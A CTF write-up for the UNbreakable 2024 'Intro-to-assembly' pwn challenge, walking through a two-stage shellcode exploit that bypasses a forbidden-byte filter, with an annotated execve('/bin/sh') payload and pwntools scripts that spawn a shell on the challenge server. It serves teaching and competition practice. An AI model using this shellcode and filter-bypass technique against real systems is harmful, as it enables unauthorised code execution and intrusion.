UNBREAKABLE WRITEUP

# UNBREAKABLE CTF 2024 - WRITEUP

## The Challenge

This challenge was a part of the UNbreakable 2024 CTF in the individual category.

**Name:** Intro-to-assembly
**Category:** Pwn
**Difficulty:** Easy
**Solves:** 24
**Description:** I want the shell, but they want me to work for it :(
**File:**

## Discovery

The first thing we see when we lay eyes upon this challenge is that we have access to an address where we can connect remotely and that we are given the binary file intro-to-assembly. If we open this file in IDA and go to the main function, this is what we get:

![image](https://hackmd.io/_uploads/r13eNRAA6.png)

After analyzing it, we can confidently say that the function works as follows:

- Uses the mmap() function to allocate 24 bytes of memory, with permissions set to read, write, and execute.
- Uses the read() function to read 24 bytes from standard input into the buffer.
- Initializes the 'dest' variable with zeros and then copies the input from 'buf' into 'dest' based on the length of the input.
- Starts looping through each byte of the input.
- Checks to see if the current byte is 0x31 ('1'), 0x0F or 0x05.
- If found, it will print an error message and exit the program.
- Otherwise, it will execute the buffer as code.

In addition to the functionality described above, we can also address the `__readfsqword(0x28u)` call which is used at the beginning and at the end. This represents the stack canary, a buffer overflow protection, which can also be confirmed by running the command `checksec --file=intro-to-assembly`:

![image](https://hackmd.io/_uploads/SJED2AARp.png)

## Exploitation & Debugging

While the discovery phase was fairly straightforward, we now need to find a way to exploit the file. We know that we cannot do a buffer overflow and we know that we can input up to 24 bytes of code into the buffer. The first idea we could try is to see if we can input a syscall, but remember that we also have a check for specific bytes.
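
To make the byte check concrete, here is a minimal Python sketch of the filter as described in the list above. It is not the binary's actual code: the helper name `rejected_offsets` and the sample bytes are made up for illustration, and the only thing taken from the analysis is the set of forbidden values (0x31, 0x0F, 0x05), each tested one byte at a time.

```python
# Byte values the challenge refuses to execute, per the analysis of main().
FORBIDDEN = {0x31, 0x0F, 0x05}

def rejected_offsets(payload: bytes) -> list:
    """Return the offset of every forbidden byte in payload (hypothetical helper)."""
    return [i for i, b in enumerate(payload) if b in FORBIDDEN]

# Arbitrary sample input: three of these five bytes are on the forbidden list.
sample = bytes([0x90, 0x31, 0xC0, 0x0F, 0x05])
print(rejected_offsets(sample))  # [1, 3, 4]
```

Any payload for which this returns an empty list would get past the check; a single hit anywhere in the input is enough for the program to bail out.
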
If we use an online assembler we can see that 'syscall' has the raw hex bytes '0F05', exactly the sequence that we are prevented from using.

The next idea we could try is to first input a payload that calls the read function again. This might work because the second time we input something, our input won't pass through the byte-check, so we can write whatever we want. Let's try it with the following input:

```assembly
mov rsi,rdx
push rax
pop rdi
mov rdx,0x100
push 0x401110
pop rax
call rax
```

To explain how this works: first we copy rdx, which holds the address of our buffer, into rsi, so that the new input is stored in the same buffer. Then we need a '0' in rdi in order to read from standard input. In our case, rax contained 0, so I moved the value of rax to rdi. Then we set rdx to '0x100' to specify how many bytes to read. After that, we store the address of the PLT entry of the read function in rax and then call it.

![image](https://hackmd.io/_uploads/BJgZhX1k0.png)

We can verify that code using an online assembler and we see this:

![image](https://hackmd.io/_uploads/H1-XpQy1C.png)

Our input is 20 bytes long, so it fits into the 24 bytes we have allocated, and it also does not contain any of the restricted bytes. At the moment our code looks like this:

```python
from pwn import *

context.terminal = ['tmux','splitw','-h']
p = process("intro-to-assembly")

# First stage: calls read() again on the same buffer
shellcode = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # 20bytes len
gdb.attach(p)
p.send(shellcode)
p.interactive()
```

Let's jump into gdb and see if we get the desired result. First we'll type `finish` so that we skip over the initialization code and get to the main function. Then, we'll type `disass main` to disassemble the main function. At this point we see this:

![image](https://hackmd.io/_uploads/S1omgNykR.png)

So we're going to copy the address of `call rdx`, and set a breakpoint at that address. Then we'll type `continue` to go to it.
We are interested in this address because rdx points to where our input gets stored before it gets executed, which is confirmed by this snippet we can see in IDA:

![image](https://hackmd.io/_uploads/rJtoWVJy0.png)

After we get to the `call rdx` instruction, we can use `si` to step to the next instruction.

![image](https://hackmd.io/_uploads/S1vFGEyyR.png)

Doing this, we see that the next instructions are precisely our code. Awesome! Now, if we continue to step through the following instructions, at some point we won't be able to anymore, as seen below:

![image](https://hackmd.io/_uploads/SJmImEyJ0.png)

At this stage the program is actually waiting for our input. Now if we jump over to the left side of our terminal and input something, we can see on the right side that our program automatically jumps to the next instruction.

![image](https://hackmd.io/_uploads/H1KHVVyyC.png)

If you look on the right side at the rsi register you can see that it points to our input, just like we told it to in our code. So it works as expected. So far so good, all we need to do now is to insert a payload in the second input that will give us shell access. We can use this one:

```assembly
"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
```

The disassembled version looks like this:

```assembly
0:  31 c0                   xor    eax,eax
2:  48 bb d1 9d 96 91 d0    movabs rbx,0xff978cd091969dd1
9:  8c 97 ff
c:  48 f7 db                neg    rbx
f:  53                      push   rbx
10: 54                      push   rsp
11: 5f                      pop    rdi
12: 99                      cdq
13: 52                      push   rdx
14: 57                      push   rdi
15: 54                      push   rsp
16: 5e                      pop    rsi
17: b0 3b                   mov    al,0x3b
19: 0f 05                   syscall
```

You can find this on the Internet and it requires no adjustments in order to work. However, I'm going to explain how it works, just because it's interesting to see.

First of all, let's understand our purpose. We're planning to use the execve() syscall in order to gain access to the shell. What the syscall does is replace the program running in the current process with a new one.
If you look at the manual page I've added to the resources section, you'll see that the structure of the execve() syscall looks like this:

```
int execve(const char *pathname, char *const _Nullable argv[],
           char *const _Nullable envp[]);
```

As you can see, it takes 3 arguments: the pathname of the program to execute, an array of string arguments (argv) and an array of strings (envp) representing the environment variables for the new program.

For the first argument, the path we're gonna need to specify is `/bin/sh`, which will open a new shell instance. The second argument is an array in which you first specify the name of the executed program and then any other command-line arguments you want to pass to it. Since we don't want the shell to start in a modified state, we need only the name. So our second argument should look like this: `["/bin/sh", NULL]`, with a NULL pointer at the end to mark the end of the array. The final argument will also be `NULL` since we don't require environment variables in this case.

All together, our final syscall should look like this: `execve("/bin/sh", ["/bin/sh", NULL], NULL)`. Let's see how this payload accomplishes that.

```assembly
xor eax, eax
```

- this is an efficient way of setting the eax register to 0 by xoring the value with itself, which takes fewer bytes than moving an immediate value into the register. eax will later be used to specify the syscall number.

```assembly
movabs rbx,0xff978cd091969dd1
neg rbx
push rbx
```

- these three work together in an interesting way. The first instruction moves the immediate value `0xff978cd091969dd1` into rbx. Then the second instruction negates that value (two's complement). The result of that negation is `0x0068732f6e69622f`. Doesn't seem interesting yet? Let's convert the resulting value to its ASCII representation. Reading the bytes from the most significant to the least significant, we get `\0hs/nib/`. Since x86 is little-endian, the bytes are stored in memory in the opposite order, which gives `/bin/sh\0`: exactly the NULL-terminated string we need in order to gain shell access.
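
A quick way to check this step is to redo the negation outside the debugger. The sketch below uses only Python's standard library; `MASK64`, `imm`, `negated` and `on_stack` are names chosen for illustration, and the only value taken from the payload is the `movabs` immediate.

```python
import struct

MASK64 = (1 << 64) - 1               # keep results within a 64-bit register

imm = 0xFF978CD091969DD1             # immediate loaded by `movabs rbx, ...`
negated = (-imm) & MASK64            # what `neg rbx` leaves in rbx (two's complement)
on_stack = struct.pack("<Q", negated)  # byte order in memory after `push rbx` (little-endian)

print(hex(negated))  # 0x68732f6e69622f
print(on_stack)      # b'/bin/sh\x00'
```

The immediate itself contains no zero byte, while the value it turns into ends with the `\x00` terminator the string needs.
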
The reason this payload goes through the process of negating the value is that if you were to pass `0x0068732f6e69622f` directly, depending on how the payload is delivered, it might get cut off at the NULL byte (0x00). By using `0xff978cd091969dd1` instead, we avoid that. The third instruction just pushes the resulting value onto the stack.

```assembly
push rsp
pop rdi
```

- pushes the value of rsp (the stack pointer) onto the stack. At this point rsp holds the address of the string `/bin/sh`, which we just pushed. Then it pops that value into rdi, setting it up as the first argument to the execve syscall, which expects a pointer to the path of the program to execute.

```assembly
cdq
```

- this is just a short way to set rdx to 0, which sets the third argument of execve() to NULL. cdq sign-extends eax into edx, and since we previously set eax to 0, edx becomes 0 as well. Writing to edx also clears the upper 32 bits of rdx, so the whole of rdx ends up as 0.

```assembly
push rdx
push rdi
push rsp
pop rsi
```

- These instructions manipulate the stack to set up the second argument to execve, the array of arguments to the program. By pushing rdx (which is zero) and then rdi (the address of /bin/sh), the code constructs an argv array with a single element (the address of /bin/sh) that is terminated by a NULL pointer. It then pushes rsp, which now holds the address of that array, and pops it into rsi, setting it up as the second argument to the execve syscall. Below I attached a visualization of the stack right after `push rsp`.

```
+---------------------------+ <- Higher Memory Address
| "/bin/sh\0" (the string)  | <- rdi points here
+---------------------------+
| NULL (argv[1])            |
+---------------------------+
| Address of "/bin/sh"      | <- argv[0]
+---------------------------+
| Address of argv[0]        | <- rsp points here (popped into rsi)
+---------------------------+ <- Lower Memory Address
```

```assembly
mov al,0x3b
```

- Moves 0x3b into the lower 8 bits of the eax register, preparing for the syscall invocation.
0x3b is 59 in decimal, which is the syscall number of execve().

```assembly
syscall
```

- Executes the syscall instruction, with all the args we've set up so far.

So in the end, `execve("/bin/sh", ["/bin/sh", NULL], NULL)` will be called, which will start a new instance of the shell, giving us access to execute arbitrary commands on the server.

```python
from pwn import *

context.terminal = ['tmux','splitw','-h']
p = process("intro-to-assembly")

shellcode_first_input = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # 20bytes len
gdb.attach(p)
# bytes (b"..."), not str, so the raw values are sent unchanged
shellcode_second_input = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" # 27bytes len

payload = b'A' * 0x15 + shellcode_second_input
p.send(shellcode_first_input.ljust(0x18, b"\x90"))
p.sendline(payload)
p.interactive()
```

One part that was necessary to add to the code was the `.ljust(0x18,b"\x90")`. This pads the end of our first payload with the byte `\x90`, which encodes the `NOP` ("no operation") instruction. This instruction essentially does nothing, which is very helpful to us.

Why do we need it? Well, in the first debugging process we did, we didn't need it, because we were only sending one payload. But now we're sending two, which changes things. You probably noticed we are sending the first payload with send(), instead of sendline(). That is because sendline() would have added a `\n` at the end, which would be interpreted as shellcode and mess up our payload. As a consequence of not being able to add a 'new line', we also don't have a separator between the first payload and the second one.
Because both payloads are sent really fast one after another, whether to our program locally or to the server remotely, they can arrive as one chunk of input. The first read() asks for 24 bytes, but our first payload is only 20 bytes long, so that read can also take the first 4 bytes of the second payload (which it did, causing a segmentation fault). Since our payload is 20 bytes and the read() function reads 24 bytes, we just fill the rest of the input with `NOP`, so the first read consumes exactly the first payload and nothing else, which fixes the problem.

This is only one way of fixing this. Another way would be to add `input("????")` between sending the first payload and the second one. That way, when our first payload calls the read function, instead of immediately receiving the second payload, it will just pause and wait for you to press `enter`, and only then will the second input be sent. This also solves the problem.

Another thing I added is the `A` padding (`b'A' * 0x15`), right before the second payload. The second read() writes our input at the start of the buffer, because that's where rsi points, but when read() returns, execution continues right after the `call rax` of the first payload, which sits 20 bytes (0x14) into the buffer. If we remove the padding, you can see that after the read function, rsi points exactly at the beginning of our payload, and in the instructions you can see that after the `ret`, execution lands on `push rdi`, which is the 9th instruction of our payload (offset 0x14 in the disassembly). That's definitely not good.

![Screenshot 2024-04-15 150941](https://hackmd.io/_uploads/rJQP35ql0.png)

Now, if we keep the padding, `rsi` will point at our `A`s (represented as `41`), which fill the start of the buffer so that the instructions we want executed end up where execution resumes. And as you can see below, after the `ret` our payload actually starts at the beginning, as designed.
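
The offsets involved can be worked out without a debugger. The sketch below is plain Python (no pwntools) and rests on the behaviour described above as an assumption: the second read() writes at the start of the buffer, and execution resumes at the byte right after the `call rax` of the first payload. The variable names are illustrative; the byte strings are the two payloads from the script.

```python
first_stage = bytes.fromhex(
    "48 89 D6 50 5F 48 C7 C2 00 01 00 00 68 10 11 40 00 58 FF D0"
)
second_stage = bytes.fromhex(
    "31 c0 48 bb d1 9d 96 91 d0 8c 97 ff 48 f7 db "
    "53 54 5f 99 52 57 54 5e b0 3b 0f 05"
)

# `call rax` is encoded as FF D0 (2 bytes); read() returns to the byte after it.
resume = first_stage.index(b"\xff\xd0") + 2
print(resume)                      # 20

# Without padding, the byte at the resume offset belongs to the middle of the payload.
unpadded = second_stage
print(hex(unpadded[resume]))       # 0x57, the `push rdi` at offset 0x14

# With the padding used in the script, the shellcode is shifted past that point.
padded = b"A" * 0x15 + second_stage
print(padded.index(second_stage))  # 21
print(hex(padded[resume]))         # 0x41, the last 'A'
```

One detail this makes visible: with `0x15` bytes of padding the shellcode begins at offset 21, one byte past the resume offset of 20, so the byte executed first is the final `A`. In 64-bit mode 0x41 is a REX prefix, so it is decoded together with the instruction that follows it rather than as an instruction of its own.
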
![image](https://hackmd.io/_uploads/HkzOT59l0.png)

If we run the debugging process we did above again, this time, instead of getting to a point where the program waits for input, we can keep stepping through instructions until the last syscall where we see this:

![image](https://hackmd.io/_uploads/Bk9m64k1R.png)

As you can see, our payload worked. And so did our strategy. Even though this payload contains the 0x0F 0x05 sequence, it didn't pass through the byte-check and it got executed without problems.

Now before we move to the final step and get that flag, I just wanna point out a neat little detail. We've already seen how we bypassed the "illegal" byte check, but you might be wondering: how does our second payload work, considering it has a length of 27 bytes and we write in the same memory area where mmap() mapped 24 bytes? Aren't we going over the limit?

This scenario showcases a fundamental concept in memory management. The mmap function maps memory in whole pages. If you look in the resources posted at the end of this write-up, you'll see I linked the source code of how mmap() works. If we start reading at the 1208th line, we'll see this part:

```
len = PAGE_ALIGN(len);
if (!len)
    return -ENOMEM;
```

This code rounds the length up to a multiple of the page size, which on most systems is 4 KB, so even a request for 24 bytes results in the mapping of a full memory page. Memory is mapped and protected one page at a time, so the kernel cannot hand out anything smaller than a page, and the read, write and execute permissions we asked for apply to the whole page. That leaves more than enough room for our padding and the 27-byte payload.
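
The rounding itself is simple arithmetic. Here is a small Python sketch of the idea behind `PAGE_ALIGN`; it is not the kernel's code, and the function name `page_align` is made up for illustration. `mmap.PAGESIZE` comes from Python's standard library and reports the page size of the machine running the script, so the examples pass 4096 explicitly to match the 4 KB case discussed above.

```python
import mmap

def page_align(length: int, page_size: int = mmap.PAGESIZE) -> int:
    """Round length up to the next multiple of page_size (a power of two)."""
    return (length + page_size - 1) & ~(page_size - 1)

print(page_align(24, 4096))    # 4096: the 24-byte request still gets a full page
print(page_align(4096, 4096))  # 4096: already aligned, unchanged
print(page_align(4097, 4096))  # 8192: one byte over spills into a second page
```

So the 0x15 bytes of padding plus the 27-byte payload land well inside the single page that backs the 24-byte request.
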

Ok, now that we've also shown a bit about how memory management works, all we have to do now is comment out the local process and the gdb.attach in our code, and connect remotely like this:

```python
from pwn import *

context.terminal = ['tmux','splitw','-h']
#p = process("intro-to-assembly")
p = remote("34.89.210.219",30895)

shellcode_first_input = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # First shellcode modified. Used push rax instead of r12
#gdb.attach(p)
# bytes (b"..."), not str, so the raw values are sent unchanged
shellcode_second_input = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" # 27bytes len

payload = b'A' * 0x15 + shellcode_second_input
p.send(shellcode_first_input.ljust(0x18, b"\x90"))
p.sendline(payload)
p.interactive()
```

![image](https://hackmd.io/_uploads/HkRsR4Jy0.png)

Running the file, we have shell access to the server and there's our flag: `CTF{926e420eeeeb6ac4890ddd46af5462d922e01307ef77d97d6799b167ed17e44f}`

## Conclusion

Whilst this challenge was labeled as easy, being a pwn noob myself, I found it needed me to be pretty engaged in order to grasp all the concepts, which is precisely the reason why I wrote this in a detailed step-by-step manner. I hope this write-up has been of use and you learned as much as I did from this challenge.

## Resources

Online assembler/disassembler: https://defuse.ca/online-x86-assembler.htm#disassembly2

Functions manual pages:

- https://man7.org/linux/man-pages/man2/mmap.2.html
- https://man7.org/linux/man-pages/man2/read.2.html
- https://man7.org/linux/man-pages/man2/execve.2.html

Mmap() source code: https://codebrowser.dev/linux/linux/include/linux/mm.h.html#221
